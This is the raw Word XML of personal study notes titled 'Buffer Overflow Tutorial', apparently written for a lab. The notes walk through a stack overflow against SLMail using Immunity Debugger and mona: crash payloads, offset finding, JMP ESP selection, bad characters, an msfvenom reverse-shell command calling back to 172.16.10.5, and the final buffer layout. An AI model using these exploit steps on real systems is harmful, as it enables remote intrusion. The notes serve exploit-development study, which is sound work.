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13" w:rsidRDefault="006D6102" w:rsidP="006D6102">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Buffer Overflow Tutorial</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D6102" w:rsidRDefault="0087680B" w:rsidP="006D6102">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="008042FE" w:rsidRPr="006B2709">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="16"/>
          </w:rPr>
          <w:t>http://www.primalsecurity.net/0x0-exploit-tutorial-buffer-overflow-vanilla-eip-overwrite-2/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008042FE" w:rsidRDefault="0087680B" w:rsidP="006D6102">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="008042FE" w:rsidRPr="006B2709">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="16"/>
          </w:rPr>
          <w:t>http://proactivedefender.blogspot.com/2013/05/understanding-buffer-overflows.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008042FE" w:rsidRDefault="0087680B" w:rsidP="006D6102">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="009554D3" w:rsidRPr="006B2709">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="16"/>
          </w:rPr>
          <w:t>https://itandsecuritystuffs.wordpress.com/2014/03/18/understanding-buffer-overflows-attacks-part-1/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E20888" w:rsidRDefault="0087680B" w:rsidP="00E20888">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00E20888" w:rsidRPr="006B2709">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="16"/>
          </w:rPr>
          <w:t>https://medium.com/@johntroony/a-practical-overview-of-stack-based-buffer-overflow-7572eaaa4982</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C60C68" w:rsidRDefault="0087680B" w:rsidP="00E20888">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00A05BFF" w:rsidRPr="00656E6F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="16"/>
          </w:rPr>
          <w:t>http://sh3llc0d3r.com/vulnserver-trun-command-buffer-overflow-exploit/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A05BFF" w:rsidRPr="00971E36" w:rsidRDefault="00A05BFF" w:rsidP="00E20888">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00971E36">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>https://www.securitysift.com/windows-exploit-development-part-1-basics/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D55455" w:rsidRDefault="00D55455" w:rsidP="00D55455">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>EIP – Extended Instruction Pointer – Address of the Next Instruction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D55455" w:rsidRDefault="00D55455" w:rsidP="00D55455">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ESP – Extended Stack Pointer is the top of the stack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D55455" w:rsidRDefault="00D55455" w:rsidP="00D55455">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>EBP – Extended Base Pointer  is the bottom of the stack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D55455" w:rsidRPr="00D55455" w:rsidRDefault="00D55455" w:rsidP="00D55455">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006D6102" w:rsidRDefault="006D6102" w:rsidP="006D61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Attach/Open Program to Immunity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Hit Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D6102" w:rsidRDefault="006D6102" w:rsidP="006D61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Crash Program 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Python Script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python –c ‘prin</w:t>
      </w:r>
      <w:r w:rsidR="00734546">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>t “A”*1000’ | nc bof.local 9000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D6102" w:rsidRDefault="006D6102" w:rsidP="006D61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Verify Crash with EIP = 41414141</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D6102" w:rsidRDefault="006D6102" w:rsidP="006D61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Pattern to Fill EIP With</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E79DF" w:rsidRDefault="000E79DF" w:rsidP="000E79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Technically here we are overwriting buffer -&gt; return address -&gt; return (pops) and return = EIP value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E79DF" w:rsidRDefault="000E79DF" w:rsidP="000E79D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See 0xdf messages on Slack.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Pattern_create.rb –l 1000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!mona pc 1000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D6102" w:rsidRDefault="006D6102" w:rsidP="006D610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Outputs to working folder C:\Users\Aidan Preston\Destkop\pattern.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B83A45" w:rsidRDefault="00B83A45" w:rsidP="00B83A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Offset from EIP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B83A45" w:rsidRDefault="00B83A45" w:rsidP="00B83A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./pattern.rb 31456791</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B83A45" w:rsidRDefault="00B83A45" w:rsidP="00B83A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!mona pattern_offset 0X7A46317A (Value of EIP at Crashtime)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00100ED4" w:rsidRDefault="00100ED4" w:rsidP="00100ED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!mona po (address)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00941977" w:rsidRDefault="00941977" w:rsidP="00B83A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!mona findmsp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B1D80" w:rsidRDefault="006B1D80" w:rsidP="006B1D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EIP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B1D80" w:rsidRDefault="006B1D80" w:rsidP="006B1D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the offset is 230 for example this means we have to send 230bytes of data and then 4 bytes in our exploit, which will be a memory address of an instruction we want to execute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00307B37" w:rsidRPr="00A8679B" w:rsidRDefault="00307B37" w:rsidP="00307B37">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Find Module</w:t>
      </w:r>
      <w:r w:rsidR="00A8679B">
        <w:t xml:space="preserve"> to JMP ESP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A8679B" w:rsidRPr="00484D34" w:rsidRDefault="00A8679B" w:rsidP="00A8679B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00484D34">
        <w:t xml:space="preserve">!mona modules </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A8679B" w:rsidRPr="00484D34" w:rsidRDefault="00A8679B" w:rsidP="00A8679B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00484D34">
        <w:t>Choose Module with no ASLR, DEP, Rebase</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A8679B" w:rsidRPr="00484D34" w:rsidRDefault="00A8679B" w:rsidP="00A8679B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00484D34">
        <w:t>Also no bad characters in memory location</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A8679B" w:rsidRDefault="00A8679B" w:rsidP="00A8679B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00484D34">
        <w:t>No zeros etc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0087680B" w:rsidRPr="00484D34" w:rsidRDefault="0087680B" w:rsidP="00A8679B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>00</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00A8679B" w:rsidRDefault="00A8679B" w:rsidP="00A8679B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00484D34">
        <w:t>!mona find –s “\xff\xe4” –m slmfc.dll</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F5CAE" w:rsidRDefault="006F5CAE" w:rsidP="00A8679B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>\xff\xe4  = JMP ESP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00362DDC" w:rsidRDefault="00362DDC" w:rsidP="00362D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Find Bad Chars</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00362DDC" w:rsidRDefault="0087680B" w:rsidP="00362DDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00362DDC" w:rsidRPr="006B2709">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>https://bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00362DDC" w:rsidRDefault="00362DDC" w:rsidP="00362D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Space for Shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00362DDC" w:rsidRPr="00227972" w:rsidRDefault="00362DDC" w:rsidP="00362DDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>buffer+= "A" * 2606 +"\x8f\x35\x4a\x5f" + "C" * 390</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00362DDC" w:rsidRPr="00227972" w:rsidRDefault="00362DDC" w:rsidP="00362DDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>eiptest.py (SLMAIL BOF Folder)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00362DDC" w:rsidRPr="00362DDC" w:rsidRDefault="00362DDC" w:rsidP="00362DDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Right Click ESP Register and choose Follow Dump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00287C46" w:rsidRDefault="001A41B6" w:rsidP="001A41B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Generating Shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A41B6" w:rsidRDefault="001A41B6" w:rsidP="001A41B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001A41B6">
        <w:t>msfvenom -p windows/shell_reverse_tcp LHOST=172.16.10.5 LPORT=4444 -b "\x00\x0a\x0d" --format python</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05052" w:rsidRDefault="00B05052" w:rsidP="00B05052">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Getting A Shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05052" w:rsidRPr="007302C2" w:rsidRDefault="00B05052" w:rsidP="00B05052">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007302C2">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Buffer = overflowamount + EIPVALUE + NOPS + shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D5436" w:rsidRPr="007302C2" w:rsidRDefault="004D5436" w:rsidP="00B05052">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007302C2">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Buffer = “A”*2606 + “\x8f\x35\x4a\x5f\” + “\x90” * 8 + shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0016623C" w:rsidRPr="007302C2" w:rsidRDefault="0016623C" w:rsidP="0016623C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007302C2">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EIPVALUE = </w:t>
      </w:r>
      <w:r w:rsidR="004D5436" w:rsidRPr="007302C2">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>“\x8f\x35\x4a\x5f\” = 5F4A358F (Little Endian)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0016623C" w:rsidRPr="007302C2" w:rsidRDefault="007302C2" w:rsidP="0016623C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007302C2">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>NOPS = “\x90” - * 8 or * 16 should be enough to provide some padding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB3300" w:rsidRDefault="00CB3300" w:rsidP="00A84B28">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00687141" w:rsidRPr="006D6102" w:rsidRDefault="00687141" w:rsidP="00A84B28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>
            <wp:extent cx="5731510" cy="3220747"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Picture 1" descr="https://docs.google.com/drawings/d/15X2cy8bMYzAbHVUWVmn06nShC21_1Payr2f0Guqq7Ds/pub?w=889&amp;h=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15X2cy8bMYzAbHVUWVmn06nShC21_1Payr2f0Guqq7Ds/pub?w=889&amp;h=4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141" w:rsidRPr="006D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C73CE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="01E03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02"/>
    <w:rsid w:val="000E79DF"/>
    <w:rsid w:val="00100ED4"/>
    <w:rsid w:val="0016623C"/>
    <w:rsid w:val="001A41B6"/>
    <w:rsid w:val="00227972"/>
    <w:rsid w:val="00287C46"/>
    <w:rsid w:val="00307B37"/>
    <w:rsid w:val="00362DDC"/>
    <w:rsid w:val="00484D34"/>
    <w:rsid w:val="004D5436"/>
    <w:rsid w:val="00687141"/>
    <w:rsid w:val="006B1D80"/>
    <w:rsid w:val="006D6102"/>
    <w:rsid w:val="006F5CAE"/>
    <w:rsid w:val="007302C2"/>
    <w:rsid w:val="00734546"/>
    <w:rsid w:val="008042FE"/>
    <w:rsid w:val="0087680B"/>
    <w:rsid w:val="008E3213"/>
    <w:rsid w:val="00941977"/>
    <w:rsid w:val="009554D3"/>
    <w:rsid w:val="00971E36"/>
    <w:rsid w:val="009D7C81"/>
    <w:rsid w:val="009E21EE"/>
    <w:rsid w:val="00A05BFF"/>
    <w:rsid w:val="00A84B28"/>
    <w:rsid w:val="00A8679B"/>
    <w:rsid w:val="00B05052"/>
    <w:rsid w:val="00B83A45"/>
    <w:rsid w:val="00C35212"/>
    <w:rsid w:val="00C60C68"/>
    <w:rsid w:val="00CB3300"/>
    <w:rsid w:val="00CB57BF"/>
    <w:rsid w:val="00D278C9"/>
    <w:rsid w:val="00D30F33"/>
    <w:rsid w:val="00D35C4F"/>
    <w:rsid w:val="00D55455"/>
    <w:rsid w:val="00E20888"/>
    <w:rsid w:val="00E3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84EA0-A75A-47EC-8F31-1EDBD07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hntroony/a-practical-overview-of-stack-based-buffer-overflow-7572eaaa49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andsecuritystuffs.wordpress.com/2014/03/18/understanding-buffer-overflows-attacks-part-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activedefender.blogspot.com/2013/05/understanding-buffer-overflow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primalsecurity.net/0x0-exploit-tutorial-buffer-overflow-vanilla-eip-overwrite-2/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-p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3llc0d3r.com/vulnserver-trun-command-buffer-overflow-explo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Preston</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Aidan Preston</cp:lastModifiedBy>
  <cp:revision>24</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-03-14T15:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-03-15T12:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>